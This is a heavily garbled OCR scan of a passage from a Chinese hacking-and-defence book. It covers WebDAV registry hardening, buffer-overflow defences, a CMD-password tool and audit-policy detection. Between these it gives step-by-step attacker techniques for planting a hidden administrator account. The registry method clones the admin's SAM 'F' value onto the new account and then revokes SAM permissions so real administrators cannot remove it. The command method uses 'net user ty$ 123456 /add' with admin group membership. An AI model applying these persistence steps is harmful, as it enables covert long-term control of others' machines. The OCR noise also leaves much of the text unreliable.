意 操作 。 


丽 teinet 192.168.0.10 7788 口 x 


v 


step 图 在 “命令 提示 符 ” 窗 口中 输入 cdci\ 命 
令 ， 即 可 进入 目标 主机 的 C 盘 目 录 。 
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画 CWWINDOWS\system32\em... 过 
(c) 2018 Jicrosoft Corporation。 保 留 所 有 权利 。 ^ 


C:AUsersNAdministrator>cd c:\ 
c:\> 


渐 绝招 4: WebDAV 缓 冲 区 溢出 漏洞 的 
防御 

如 果 不 能 立刻 安装 补丁 或 者 升级 ， 用 
户 可 以 采取 以 下 措施 来 降低 威胁 。 

(1) 使 用 微软 提供 的 IS Lockdown 工 
具 防 止 该 漏洞 被 利用 。 

(2) 可 以 在 注册 表 中 完全 关闭 Web- 
DAV 包括 的 PUT 和 DELETE 请 求 ， 具 体 
的 操作 步骤 如 下 。 

[step 图 启动 注册 表 编 辑 器 。 打 开 “ 运 行 ”对 
话 框 ， 在 “打开 ”文本 框 中 输入 regedit， 
然后 按 Enter 键 ， 打 开 “ 注 册 表 编辑 器 ” 窗 
口 ， 如 下 图 所 示 。 


CE -oO x 
六 kk 办 由 昌 ， 吉 看。 必 起 (3) 地区 
Vv 加 + 和 a 

国 HKeycuAsses RooT ih 

目 hksr cuRRENT_usER 

HKEYLOCALMACHINE 
目 hkEy_usERs 
HEYiCURRENT. CONAG 


NEV LEAL MACHINE | 


tes 图 在 注册 表 中 依次 找到 如 下 和 键 : 
HKEY_ LOCAL MACHINE\SYSTEM\ 
CurrentControlSet\Services\W3SVC\ 
Parameters。 
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国 = oO x 
Eu 


| mean 


[step 图 选中 该 键 值 后 单 击 右键 ， 在 弹出 
的 快捷 菜单 中 选择 “新 建 ” 选 项 ， 即 
可 新 建 一 个 项 目 ， 并 将 该 项 目 命名 为 
DisableWebDAV， 如 下 图 所 示 。 


FES = 
诡 [ 伯 站 将 二 E】 间 委 MV) 避 宙 六) (1 


HEINEY LOCAL MACHINENSYSTEMYCurrentControlSetServicec\W3SYO\ Parameters\Dicable WebDAV 


[Sep 四 选中 新 建 的 项 目 DisableWebDAV， 在 
窗口 右 侧 的 “数值 ”下 侧 右 击 ， 在 弹出 的 
快捷 菜单 中 选择 “DWORD (32 位 ) 值 CD)” 
选项 ， 如 下 图 所 示 。 


[step 图 选择 完毕 后 ， 即 可 在 “注册 表 编 辑 
器 ”窗口 中 新 建 一 个 键 值 ， 然 后 选择 该 键 
值 ， 在 弹出 的 快捷 菜单 中 选择 “修改 ” 选 
项 ， 打 开 “ 编 辑 DWORD (32 位 ) 值 ” 
对 话 框 ， 在 “数值 名 称 ” 文 本 框 中 输入 
DisableWebDAV， 在 “数值 数据 ”文本 框 中 
输入 1， 如 下 图 所 示 。 


编辑 DWORD (32 位 ) 值 x 
数值 名 称 (N): 

DisableWebDAy | 
数值 数据 (V): 基数 

1 图 十 六 进 制 (H) 

口 十 进 制 (D) 
Cw | ww 
step 较 单 击 “确定 ”按钮 ， 即 可 在 注册 表 中 


完全 关闭 WebDAV 包括 的 PUT 和 DELETE 
请 求 ， 如 下 图 所 示 。 


EE 


EVIEY OCAL MACHINE SVSTEMCur morec etrolSer services WISVC Pr ramarerA Dobie web OAV 


4.4 ”防止 缓冲 区 溢出 攻击 的 
方法 
缓冲 区 溢出 是 当今 流行 的 一 种 网 络 攻 
击 方法 ， 它 易于 攻击 而 且 危 害 严重 ， 给 系 
统 的 安全 带 来 了 极 大 的 隐患 。 因 此 ， 如 何 
及 时 有 效 地 检测 出 计算 机 网 络 系统 攻击 行 


为 ， 已 越 来 越 成 为 网 络 安全 管理 的 一 项 重 
要 内 容 。 
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绝招 5: 防范 缓冲 区 溢出 的 根本 方法 

目前 有 4 种 基本 的 方法 保护 缓冲 区 免 
受 缓冲 区 溢出 的 攻击 和 影响 ， 包 括 编写 正 
确 的 代码 、 非 执行 的 缓冲 区 、 数 组 边界 检 
查 和 程序 指针 完整 性 检查 。 


1. 编写 正确 的 代码 


编写 正确 的 代码 是 防止 缓冲 区 溢出 攻 
击 最 直接 最 有 效 的 方法 ， 也 是 一 件 非 常 有 
意义 的 工作 ， 特 别 是 编写 像 C 语言 那 种 具 
有 容易 出 错 倾向 的 程序 更 显得 很 有 意义 。 
然而 ， 尽 管 花 了 很 长 的 时 间 使 得 人 们 知道 
了 如 何 编 写 安全 的 程序 组 ， 但 是 具有 安全 
漏洞 的 程序 依旧 出 现 。 为 此 ， 人 们 又 开发 
了 一 些 工 具 和 技术 来 帮助 经 验 不 足 的 程序 
员 编 写 安全 正确 的 程序 代码 。 

最 简单 的 方法 就 是 用 grep 来 搜索 源 代 
码 中 容易 产生 漏洞 的 库 的 调用 ， 然 而 依然 
有 漏网 之 鱼 存 在 。 为 了 应 对 这 些 问 题 ， 人 
们 又 开发 了 一 些 高 级 的 查 错 工具 ， 如 fault- 
injection 等 。 这 些 工 具 的 目的 在 于 通过 人 为 
随机 地 产生 一 些 缓冲 区 溢出 来 寻找 代码 的 
安全 漏洞 ， 还 有 一 些 静 态 分 析 工 具 ， 用 于 
侦 测 缓冲 区 溢出 的 存在 。 

虽然 这 些 工具 可 以 帮助 程序 员 开 发 更 
安全 的 程序 ， 但 是 由 于 C 语言 的 特点 ， 这 
些 工具 不 可 能 找 出 所 有 的 缓冲 区 溢出 漏洞 。 
所 以 ， 侦 错 技术 只 能 用 来 减少 缓冲 区 溢出 
的 可 能 ， 并 不 能 完全 地 消除 它 的 存在 ， 除 
非 程序 员 能 保证 他 的 程序 万 无 一 失 。 


2. 非 执行 的 缓冲 区 

通过 使 被 攻击 程序 的 数据 段 地 址 空间 
不 可 执行 ， 从 而 使 得 攻击 者 不 可 能 执行 被 
植 入 被 攻击 程序 输入 缓冲 区 的 代码 ， 这 种 
技术 被 称 为 非 执行 的 缓冲 区 技术 。 事 实 上 ， 
很 多 旧 的 UNIX 系统 都 是 这 样 设计 的 ， 但 
是 近来 的 UNIX 和 Windows 系统 为 实现 更 
好 的 性 能 和 功能 ， 往 往 在 数据 段 中 动态 地 
放 入 可 执行 的 代码 ， 所 以 ， 为 了 保持 程序 
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的 兼容 性 ， 不 可 能 使 得 所 有 程序 的 数据 段 
不 可 执行 。 

针对 这 一 问题 ， 用 户 可 以 设 定 堆 栈 数 
据 段 不 可 执行 ， 这 样 就 可 以 最 大 限度 地 保 
证 了 程序 的 兼容 性 。Linux 和 Windows 都 
发 布 了 有 关 这 方面 的 内 核 补丁 ， 因 为 几乎 
没有 任何 合法 的 程序 会 在 堆栈 中 存放 代码 ， 
这 种 做 法 几乎 不 产生 任何 兼容 性 问题 ， 但 
是 在 Linux 中 的 两 个 特例 中 ， 可 执行 的 代码 
必须 被 放 入 堆栈 中 ， 因 此 这 个 方法 虽 好 
但 还 是 不 能 完全 地 杜绝 所 有 的 缓冲 区 溢出 
漏洞 的 攻击 。 

非 执行 堆栈 的 保护 可 以 有 效 地 应 对 把 
代码 植 入 自动 变量 的 缓冲 区 溢出 攻击 ， 而 
对 于 其 他 形式 的 攻击 则 没有 效果 。 通 过 引 
用 一 个 驻 留 的 程序 的 指针 ， 就 可 以 跳 过 这 
种 保护 措施 。 其 他 的 攻击 可 以 采用 把 代码 
植 入 堆栈 或 者 静态 数据 段 中 来 跳 过 保护 。 


3. 数组 边界 检查 


数组 边界 检查 能 防止 所 有 的 缓冲 区 滋 
出 的 产生 和 攻击 。 这 是 因为 只 要 数组 不 能 
被 溢出 ， 也 就 是 说 ， 如 果 数 据 不 允许 超过 
长 度 ， 溢 出 攻击 也 就 无 从 谈 起 。 为 了 实现 
数组 边界 检查 ， 就 需要 把 所 有 对 数组 的 读 
写 操作 都 检查 一 遍 ， 以 确保 对 数组 的 操作 
在 正确 的 范围 。 最 直接 的 方法 是 检查 所 有 
的 数组 操作 ， 但 是 通常 可 以 来 用 一 些 优化 
的 技术 来 减少 检查 的 次 数 。 目 前 有 以 下 的 
几 种 检查 方法 。 

1) Compaq C 编译 器 

Compaq 公司 为 Alpha CPU 开发 的 C 编 
译 器 支持 有 限度 的 边界 检查 〈 使 用 check_ 
bounds 参数 ) 。 它 的 检查 是 有 限 的 ， 存 在 以 
下 限制 : 

(1) 只 有 显示 的 数组 引用 才 被 检查 ， 
如 a[3] 会 被 检查 ， 而 “*(a+3)” 则 不 会 。 

(2) 由 于 所 有 的 C 数 组 在 传送 的 时 候 
是 指针 传递 的 ， 所 以 传递 给 函数 的 数组 不 
会 被 检查 。 
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(3) 带 有 危险 性 的 库 函 数 〈 如 strcpy) 
不 会 在 编译 的 时 候 进行 边界 检查 ， 即 便 是 
指定 了 边界 检查 。 在 C 语言 中 利用 指针 进 
行 数组 操作 和 传递 是 非常 频繁 的 ， 因 此 这 
种 局 限 性 是 非常 严重 的 。 通 常 这 种 边界 检 
查 用 来 程序 的 查 错 ， 不 能 保证 不 发 生 缓冲 
区 溢出 的 漏洞 。 

2) C 数组 边界 检查 

Richard Jones 和 Paul Kelly 开 发 了 一 
个 gcc 的 补丁 ， 用 来 实现 对 C 程序 完全 的 
数组 边界 检查 。 而 且 由 于 没有 改变 指针 的 
含义 ， 所 以 被 编译 的 程序 和 其 他 的 gcc 模 
块 具 有 很 好 的 兼容 性 。 更 进一步 的 是 ， 他 
们 由 此 从 没有 指针 的 表达 式 中 导出 了 一 个 
“ 基 ” 指 针 ， 然 后 通过 检查 这 个 基 指 针 
来 侦 测 表达 式 的 结果 是 否 在 允许 的 范围 
之 内 。 

(1) Purify 工具 : 存储 器 存 取 检查 。 

Purify 是 C 程序 调试 时 查看 存储 器 使 用 
的 工具 而 不 是 专用 的 安全 工具 。Purify 使 用 
“目标 代码 插入 ”技术 来 检查 所 有 的 存储 
器 存 取 。 

(2) 类 型 安全 的 语言 。 

目前 ， 大 部 分 的 缓冲 区 溢出 漏洞 都 源 
于 C 语 言 的 类 型 不 安全 。 如 果 只 有 类 型 安 
全 的 操作 才 可 以 被 允许 执行 ,这样 就 不 可 
能 出 现 对 变量 的 强制 操作 。 作 为 新 手 ， 推 
荐 使 用 具有 类 型 安全 的 语言 ， 如 Java 和 
ML。 但 是 ， 作 为 Java 执行 平台 的 Java 虚 
拟 机 是 C 程序 ， 因 此 攻击 JVM 的 一 条 途径 
是 使 JVM 的 缓冲 区 溢出 。 


4. 程序 指针 完整 性 检查 


程序 指针 完整 性 检查 和 边界 检查 有 略 
微 的 不 同 。 与 防止 程序 指针 被 改变 不 同 ， 
程序 指针 完整 性 检查 在 程序 指针 被 引用 之 
前 检测 到 它 的 改变 。 因 此 ， 即 便 一 个 攻击 
者 成 功 地 改变 程序 的 指针 ， 由 于 系统 事先 
检测 到 了 指针 的 改变 ， 因 此 这 个 指针 将 不 


会 被 使 用 。 与 数组 边界 检查 相 比 ， 这 种 方 
法 不 能 解决 所 有 的 缓冲 区 溢出 问题 ;采用 
其 他 的 缓冲 区 溢出 方法 就 可 以 避免 这 种 检 
测 。 但 是 这 种 方法 在 性 能 上 有 很 大 的 优势 ， 
而 且 兼 容 性 也 很 好 。 
绝招 6: 普通 用 户 防范 缓冲 区 溢出 的 方法 
防范 缓冲 区 溢出 的 根本 方法 对 于 计算 机 
普通 用 户 并 不 适合 ， 下 面 介绍 一 下 普通 的 用 
户 如 何 才 能 有 效 地 防止 溢出 漏洞 的 攻击 。 


1. 关闭 不 需要 的 端口 和 服务 

防范 缓冲 区 溢出 攻击 的 最 简单 方法 是 
删除 有 漏洞 的 软件 ， 如 果 默 认 安装 的 软件 
不 使 用 ， 则 关闭 或 删除 这 些 软件 ， 并 关闭 
相应 的 端口 和 服务 。 


2. 安装 厂商 最 新 的 补丁 程序 和 最 新 版 
本 的 软件 

多 数 情况 下 ， 一 个 缓冲 区 漏洞 刚刚 公 
布 ， 厂 商 就 会 发 布 或 者 将 软件 升级 到 新 的 
版 本 。 多 关注 一 下 这 些 内 容 ， 及 时 安装 这 
些 补丁 或 下 载 使 用 最 新 版 本 的 软件 ， 这 是 
防范 缓冲 区 漏洞 攻击 非常 有 效 的 方法 。 另 
外 , 应 该 及 时 检查 关键 程序 , 在 有 些 情况 下 ， 
用 户 可 以 自行 对 程序 进行 检查 ， 以 查找 最 
新 的 漏洞 补丁 和 版 本 软件 。 


3. 以 需要 的 最 小 的 权限 运行 软件 

对 于 缓冲 区 溢出 攻击 ， 正 确 地 配置 所 
有 的 软件 并 使 它们 运行 在 尽 可 能 少 的 权限 
下 是 非常 关键 的 。 例 如 ，POLP 要 求 运行 在 
系统 上 的 所 有 程序 软件 或 是 使 用 系统 的 任 
何人 ， 都 应 该 尽量 给 它们 最 小 的 权限 ， 其 
他 的 权限 一 律 禁止 。 


如 绝招 7: 通过 加 密 CMD 防 范 缓冲 区 溢出 
攻击 


在 溢出 成 功 后 ， 黑 客 必 须 调 用 系统 中 
的 cmd.exe 程序 来 获得 CMD Shell， 要 想 阻 
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止 黑 客 的 这 一 行为 ， 必 须 对 CMD 进行 权限 
控制 ， 常 用 的 就 是 对 其 进行 加 密 处 理 。 具 
体 的 操作 步骤 如 下 。 

[See 国 下 载 并 解压 缩 “ 加 密 CMD 防 溢出 工 
有 具 ”压缩 包 ， 在 其 中 双击 可 执行 文件 ， 即 
可 打开 “加 密 CMD 防洪 出 工具 ” 主 界面 ， 
如 下 图 所 示 。 


9 加 要 CMD 护 溢出 工具 


一 一 一 一 


单 击 “ 加 密 CMD” 按 钮 ， 即 可 弹出 
成 功 加 密 提 示 框 ， 且 默认 的 密码 是 admin， 
如 下 图 所 示 。 


斌 
名 
x 


step 图 在 加 密 成 功 后 ， 再 运行 CMD 程序 
时 ， 会 要 求 用 户 输入 密码 才能 登录 ， 如 下 
图 所 示 。 


而 aR RFS]#RCMD! ! ! - ODO x 


ee ms, 投 有 经 过 
人 
i 局 月 的 所 有 澡 作 以 及 留言 


Me ] 联 系 ， 已 经 有 密码 了 请 您 


过 [职业 菜 身 ] 的 九 放 不 能 
经 记 入 日 志 ， 如 果 您 还 没有 客 


请 输入 您 的 密码 : = 


[step 园 如 果 想 要 修改 默认 的 密码 ， 则 可 以 单 
击 “ 加 密 CMD 防 溢出 工具 ” 主 界面 中 的 “ 修 
改 信息 ”按钮 打开“ 修改 CMD 窗口 信息 ” 
代码 窗口 ， 在 其 中 的 admin 参数 修改 为 自 
己 设 置 的 密码 即 可 ， 如 下 图 所 示 。 
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修改 CMD 窗 口 信息 


[step 园 修改 完毕 后 ， 右 击 ， 在 弹出 的 快捷 菜 
单 中 选择 “保存 ”选项 ， 即 可 保存 为 自己 
需要 的 密码 ， 并 弹出 “信息 ”对 话 框 ， 提 
示 用 户 保存 成 功 ， 如 下 图 所 示 。 


信息 ; x 


0 保存 成 功 ! 


[Eee 图 如 果 不 想 再 为 CMD 加 密 ， 则 可 以 在 
主 界面 中 单 击 “ 解 密 CMD” 按 钮 ， 弹 出 “ 信 
息 ” 对 话 框 ， 提 示 用 户 解密 成 功 ， 如 下 图 
所 示 。 


信息 : x 


二 解 记 成 功 | 


在 对 CMD 进行 加 密 后 ， 即 使 黑客 获得 
了 CMD Shell， 但 是 在 利用 系统 命令 添加 账 
号 时 ， 会 通过 TFTP、FTP 和 VBS 等 方式 
上 传 文件 或 进一步 控制 服务 器 时 ， 由 于 各 
种 命令 被 进行 了 权限 设置 ， 也 无 法 获取 溢 
出 主机 的 控制 权 ， 这 就 起 到 了 保护 主机 的 
目的 。 
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4.5 ”网 络 渗透 入 侵 系统 的 手段 
与 防御 


入 侵 计算 机 系统 是 黑客 的 首要 任务 ， 
无 论 采用 什么 手段 ， 只 要 入 侵 到 目标 主机 
的 系统 中 ， 这 一 台 计 算 机 就 相当 于 是 黑客 
的 了 ， 下 面 介 绍 入 侵 系 统 的 常用 手段 与 防 
御 方 法 。 


绝招 8: 通过 注册 表 创 建 隐藏 账号 入 侵 


注册 表 是 Windows 系统 的 数据 库 ， 包 品 
含 系统 中 非常 多 的 重要 信息 ， 也 是 黑客 最 
多 关注 的 地 方 ， 下 面 就 来 看 看 黑客 是 如 何 
使 用 注册 表 来 更 好 地 隐藏 入 侵 账号 的 。 具 
体操 作 步 骤 如 下 。 

[step 图 | 选择 “开始 ”一 “运行 ”选项 ， 打 开 
“运行 ”对 话 框 ， 在 “打开 ”文本 框 中 输 
入 regedit， 如 下 图 所 示 。 


际 所 给 和 的 名 称 ,为 作 打 开 杠 应 的 性 序 


2 MB) 


Eee 图 单 去“ 确定 ”按钮 ， 打 开 “ 注 册 表 
编辑 器 ”窗口 ， 在 左 侧 窗口 中 ， 依 次 选择 
HKEY LOCAL MACHINE\SAMASAM 注册 
表 项 ， 右 击 SAM， 在 弹出 的 快捷 菜单 中 选 
择 “ 权 限 ” 选 项 ， 如 下 图 所 示 。 


[step 图 打开 “SAM 的 权限 ”对 话 框 ， 在 “组 
或 用 户 名 ” 栏 中 选择 Administrators， 然 后 
在 “Administrators 的 权限 ” 栏 中 选中 “ 完 
全 控制 ”和 “ 读 取 ” 复 选 框 ， 单 击 “确定 ” 
按钮 保存 设置 ， 如 下 图 所 示 。 


= 
网 = 
人 
| 
Si 
计 这 击 [2 口 
2 Be 
x 
人 
[ED w | 


依次 选择 HKEY LOCAL MACHINE\ 
SAM\SAM\Domains\Account\Users\ Names 
注册 表 项 ， 即 可 查看 到 以 当前 系统 中 的 所 
有 系统 账户 名 称 命名 的 子 项 ， 如 下 图 所 示 。 
ee i wd dh ” 
[NIEY_LOCAL MACHINENSAMVS AM\D omai na Nec ou rar Niman ] 


“sae = 
REGLNONE 


EE 
后 


Ss 
下 wscusioacoun 
vin 
目 wasauuperede 


由 secury 


step 图 右 击 ty$ 项 ， 在 弹出 的 快捷 菜单 中 选 
择 “ 导 出 ”选项 ， 如 下 图 所 示 。 


时 下 办 各 - oO x 

4 I EN A 到 | 

ENEY LOCAL_ MACHINE SAM\SAM Domaira\AccounfiUser Nemes NS 

“| sm EE EE 
EL oa 
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step 较 打开 “导出 注册 表 文件 ”对 话 框 ， 将 
该 项 命名 为 tyTeg， 然 后 单 击 “ 保 存 ” 按 钮 ， 
即 可 导出 tyreg， 如 下 图 所 示 。 


图 导 寺 注册 去 文件 x 
全 在 0): | 国文 悄 “| 全 中国 - 
如 下 和 全 9K 期 
AS 下 aoqsries 2018/T1/26 1645 
“| sa Sorver Moragoment Sudio 2018/9/19 1323 
| 了 rp- 2018/11/28 1056 
sn DVewal Sudio2015 2018/9/19 13:37 
二 
Ee 
ms 
xpam [re CR 
i 1] v 取消 
Sn 国 
ON 
®RSTE) 


[HKEY LOCAL MACHINE\SAM\SAM\Domains\Accounf\Users\Names\tyS | 


[step 国 按照 步骤 5 的 方法 将 HKEY_ 
LOCAL MACHINE\SAM\SAM\Domains\ 
Account\Users\ 下 的 000001F4 和 000003E9 
项 分 别 导 出 并 命名 为 administratorreg 和 
userreg， 如 下 图 所 示 。 


是 号 注册 家 文生 x 
SHE [xzg | OD 
会 阁 修改 日 期 i 
360j Files 2018/11/26 1645 
= 国 colswwiuaaeansanio 2018/9/19 1323 
| Tencent Files 2018/11/28 10:5¢ 
四 _aoraranalaar i 
| 
mn 2018/11/281137  ) 
pr 208/M2813e 5 
we 
Bs am em | | 
课 存 类 型 (T) 注册 文件 (+ reg) 加 职 消 
SS 四 
Oa 
加 所 冶 分 支 ( 


[HEY LOCAL MACHINEISAM\SAN\Domains\Accourt\Users\O00003ES 


[sep 图 用 记事 本 打开 administratorreg， 选 
中 'F"= 后 面 的 内 容 并 复制 下 来 ， 然 后 打开 
userreg， 将 "F"= 后 面 的 内 容 替换 挤 ， 如 下 
图 所 示 。 完 成 后 ， 将 userreg 进行 保存 。 
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”黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


四 admirisrator -is 二 = 入 

六 中 月 ”人 二 FE] 阁 O) 去 二 NV) 才 0) 

Windows Registry Editor Version 5.00 ^ 
SAI 


TT 
1,00,00,00,0( 
,00,f4,00,00,00,1a,00,00.00,00,00,00\ 


0.01.00.00 1a00.00.00.00.00.00.00\ 
.00.00.00.00.00.00.00.00.00.00.2c\ 


D.00.00.00.00.00.00.00.00.00.zc01A 
从 右 到 左 的 网 过 村 (R] 0.00.00.00.00.00.00.00.00.2cC01.00\ 


,00.00.00.a8.00.00.00.44.01.00.00\ 
,00,00,00,00,00,64,01,00,00,38\ 
),00,00,00,00,b4,01,00,00,18,00\ 

e4,00,00,00,14,00,00,00,44,00,00\ 
4,00,05,01,01,01,00,00,00,00,00,01\ 


时 示 Uricode 控制 字 生 (9 

播 入 Unicode 之 制 了 0，。 》 
关 辐 给 入 法 | 

识字 要 所 R) 


目 user -pss - oO x 
文件 (有 病 组 (6 杞 式 (0) 豆 看 V) 才艺 (H) 
Windows Registry Editor Version 5.00 ~ 


100.00.004 100.00.00.00.00.00.00.00.00.0cOTN 
00,00,00,00,00,00,00,00,00,00,0c,01,00,00,00,00,00,00,00,00,00,00,0c.01,00\ 
00,00,00,00,00,00,00,00,00,0c,01,00,00,00,00,00,00,00,00,00,00,0c,01,00,00\ 
‘08,00,00,00,01,00,00,00,14,01,00,00,18,00,00,00,00,00,00,00,2c,01,00,00,38\ 
‘00,00,00,00,00,00,00,64,01,00,00,18,00,00,00,00,00,00,00,7c,01,00,00,18,00\ 
00,00,00,00,00,00,01,00,14,80,d4.00,00,00,e4,00,00,00,14,00,00,00,44,00,00\ 
‘00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01\ 
00,00,00,00,02,c0,14,00,ff,07,0f,00, ,00,00, ‘02\ 
‘00,90,00,04,00,00,00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00\ 
00,00,b9,35,23,c3,b8,eb,ba,d2,83,f8,21,9b,e9,03,00,00,00,00,38,00,1b,03,02,\ 


< > 


打开 “命令 提示 符 ” 窗 口 ， 输 入 net 
user ty$ /del 命令 ， 按 Enter 键 ， 即 可 将 建立 
的 隐藏 账号 ty$ 删除 ， 如 下 图 所 示 。 


管理 员 : CN\WINDOWS\system32Vcm… = 口 x 


Jiicrosoft Windows [版 本 10. 0. 17134. 319] 
(c) 2018 JIicrosoft Corporation。 保 留 所 有 权利 。 


区 人 人 at ner user ty$ /del 
命令 成 功 元 


C:\Users\Administrator> 


v 


分 别 将 tyreg 和 userreg 导入 到 注册 
表 中 ， 即 可 完成 注册 表 隐 藏 账号 的 创建 ， 
在 “本 地 用 户 和 组 ”窗口 中 ， 也 查看 不 到 
隐藏 账号 ， 如 下 图 所 示 。 
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EE = 写 关 
文件 由” 要 作 (A) 前 看 M) 帮助 (H 

各 中 | 委 珊 | GE 上 B| 日 画 

| 2 称 

| 路 Administrat 
| 加 Defautacc.. 
加 defauhuser0 
| 本 cues 
qiong Admin 
| test test 
| 西 woacuam_. 


全 全 


和 侈 提示 : 利用 此 种 方法 创建 的 隐藏 账号 在 
注册 表 中 还 是 可 以 查看 到 的 。 为 了 保证 建 
立 的 隐藏 账号 不 被 管理 员 删 除 ， 还 需要 对 
HKEY LOCAL MACHINE\SAMASAM 注册 
表 项 的 权限 取消 。 这 样 ， 即 便 是 真正 的 管 
理 员 发 现 并 要 删除 隐藏 账号 ， 系 统 就 会 报 
错 ， 并 且 无 法 再 次 赋予 权限 。 经 验 不 足 的 
管理 员 会 束手无策 。 


绝招 9: 通过 DOS 命 令 创建 隐藏 账号 入 侵 


黑客 在 成 功 入 侵 一 台 主 机 后 ， 会 在 该 加 

主机 上 建立 隐藏 账号 ， 以 便 长 期 控制 该 主 
机 ， 下 面 介绍 使 用 命令 创建 隐藏 账号 的 具 
体操 作 步 又 。 
[ep 加 右 去 “开始 ”按钮 ， 在 弹出 的 快捷 
菜单 中 选择 “运行 ”菜单 命令 ， 打 开 “ 运 
行 ” 对话 框 ， 在 “打开 ”文本 框 中 输入 
cmd， 如 下 图 所 示 。 


本 运行 x 


Windows 将 根据 你 所 给 入 的 名 称 ， 为 你 打开 杠 应 的 程序 、 
文件 夫 . 文档 或 Internet 资源 


EE] 


md ~ 
国生 用 管理 仅 限 创 建 此 任务 


| 
[Eee 加 单 击 “ 确 定 ” 按 钮 打开“ 命令 提示 


#0F(Ok 


浏览 (B)… 


符 ” 窗 口 ， 在 其 中 输入 net user ty$ 123456 
/add 命令 ， 按 Enter 键 ， 即 可 成 功 创 建 一 
个 名 为 ty$， 密 码 为 “123456” 的 隐藏 账 
号 ， 如 下 图 所 示 。 


丽 管理 员 : C\WINDOWS\system32\cmd.exe 一 口 X 


Ji crosoft Windows [版 本 10.0. 17134. 319] 
(c) 2018 Jicrosoft Corporation。 保 留 所 有 权利 。 


CiNUsersNAdministrator>net user ty$ 123456 /add 
命令 成 功 完成 。 


C:\Users\Administrator> 


在 “命令 提示 符 ” 窗 口 全 人 下 
ee administrators ty$ /add 命 令 ， 按 
Enter 键 , 即 可 对 该 隐 藏 账 号 赋 了 管理 员 权限 。 


国 管理 员 ; CAWINDOWS\system32\cemd.exe = .a 2 


Jicrosoft Windows [版 本 10.0. 17134. 319] ~ 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


GY sator net user ty$ 123456 /add 

命令 成 功 完成 。 

C:\Users\Administratornet localgroup administrators ty$ /add 
人 


C:\Users\Administrator’, 


[step 园 再 次 输入 net user 命令 ， 按 Enter 键 ， 
oe ep ode 
息 , 但 是 却 发 现 刚刚 创建 的 ty$ 并 没有 显示 ， 
如 下 图 所 示 。 


而 管理 员 : C\WINDOWS\system32\cmd.exe - 0O x 


C:\Users\Administratornet user 


\\DESETOP-RJENNOC 的 用 户 帐户 


DefaultAccount defaultuser0 
Guest qiangu est 
WAG Usa om 

命令 成 功 完成 。 


C:\Users\Administrator> 


由 此 可 见 ， 隐 藏 账号 可 以 不 被 命令 查 
看 到 ， 不 过 ， 这 种 方法 创建 的 隐藏 账号 并 
不 能 完美 被 隐藏 。 查 看 隐藏 账号 的 具体 操 
作 步 骤 如 下 。 

[step 图 在 桌面 上 右 去 “此 电脑 ”图 标 ， 在 弹 
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出 的 快捷 菜单 中 选择 “管理 ”选项 , 打开 “ 计 
算 机 管理 ”窗口 ， 如 下 图 所 示 。 


HE 


文 # 由 ”要 HA) 吉 在 M) 
扣 中 | 画 | 上 | 日 辆 


RW(H) 


ls 3 


step 图 依次 展开 “系统 工具 ”一 > 


“本 地 用 户 


和 组 ”一 “用 户 ” 选 项 ， 这 时 在 右 侧 的 窗 
格 中 可 以 发 现 创建 的 ty$ 隐藏 账号 依然 会 被 
显示 ， 如 下 图 所 示 。 


要 计算 fl 理 - oO x 
交 件 (D 站 作 (A) 查看 VM) 二 (0) 
和 中 | 吉 加 |X 国电 | 日 团 
类 计量 W 本 到 本 地 ) 全称 全 
人 让 和 SI 咖 Adminstrat 
© Este 如 DefauhAce.. 
nt 加 defauhuser0 
国 XH 天 夯 cuest 
~ 要 + 用 fn 昌 a 
te qiang Admin 
著 tet test 
四 到 
Ss 
站 设备 管理 总 较 wpAGulk. 
vB 
后 下 二 答 理 
服务 和 应 用 导 序 


侈 提示 : 这 种 隐藏 账号 的 方法 并 不 实用 ， 
只 能 做 到 在 “命令 提示 符 ” 窗 口中 隐藏 ， 
属于 入 门 级 的 系统 账户 隐藏 技术 。 


总 账号 


隐藏 账号 的 危害 是 不 容 忽视 的 ， 用 户 
可 以 通过 设置 组 策略 ， 使 黑客 无 法 使 用 隐 
藏 账号 登录 。 具 体 的 操作 步骤 如 下 。 
[step 图 右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “运行 ”菜单 命令 ， 打 开 “ 运 行 ” 
对 话 框 ， 在 “打开 ”文本 框 中 输入 gpedit. 
msc， 如 下 图 所 示 。 
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= 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


ee Eo 1 
ss 商 
4 。 Windows 村 本 人 所 绽 入 的 名称 ,为 人 打开 相应 的 序 Em 
文件 夹 . 文 入 吕 Internet 资源 . 
打开 (O): |gpedit.msd v es 
Drm 


和 i A ene rome 


4 


[step 图 单 击 “确定 ”按钮 ， 打开 “本 地 组 

策略 编辑 器 ”窗口 ， 依 次 展开 “计算 机 配 

置 ” 一 “Windows 设 置 ” 一 “安全 设置 ”一 “本 | 

地 策略 ”一 “审核 策略 ”选项 ， 如 下 图 所 示 。 | CI ew 


ee ” “| Ee 国 掖 四 上 述 步骤 ， 将 “审核 进程 跟踪 ” 
一 5 二 二 -| 选项 进行 同样 的 设置 ， 如 下 图 所 示 。 
Buse 用 :2 所 ee 
EE -| pe Wi: P= 
de 帘 快 娠 户 登录 事件 天 可笑 
一 一 南 术 藉 户 Em i 
A ea 
区 用 =5R5 配 加 th 
a Ee 
ee 
RR 名 |— 生财 不 有 RN 册 行 此 
FE sse. seams. (olen 
i 司 珊 忠 而 快 策 电 记 兰 四 
[ep 图 双击 右 侧 窗口 中 的 “审核 策略 更 改 ” 
选项 ， 打 开 “审核 策 略 更 改 属性 ”对 话 框 ， 


选中 “成 功 ” 复 选 框 ， 单 击 “ 确 定 ”按钮 | CI Le 
保存 设置 ， 如 下 图 所 示 。 [Eee 图 设置 完成 后 ， 用 户 就 可 以 通过 “计算 


ee 和 机 管理 ”窗口 中 的 “事件 查看 器 ”选项 ， 
em 查看 所 有 登录 过 系统 的 账号 及 登录 的 时 间 
如 果 有 可 疑 的 账号 ， 在 这 里 一 目 了 然 ， 即 
i 便 黑客 删除 了 登录 日 志 ， 系 统 也 会 自动 记 


Sm 录 删 除 日 志 的 账号 ， 如 下 图 所 示 。 


Oe 


Ey 
有 党 汪 二 电光 和风 上 入 二。 (a92146) 


CJ | ms 


sp 加 按照 上 述 步骤 ， 将 “审核 登录 事件 ” 
选项 进行 同样 的 设置 ， 如 下 图 所 示 。 
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侈 提示 : 在 确定 了 黑客 的 隐藏 账号 之 后 ， 
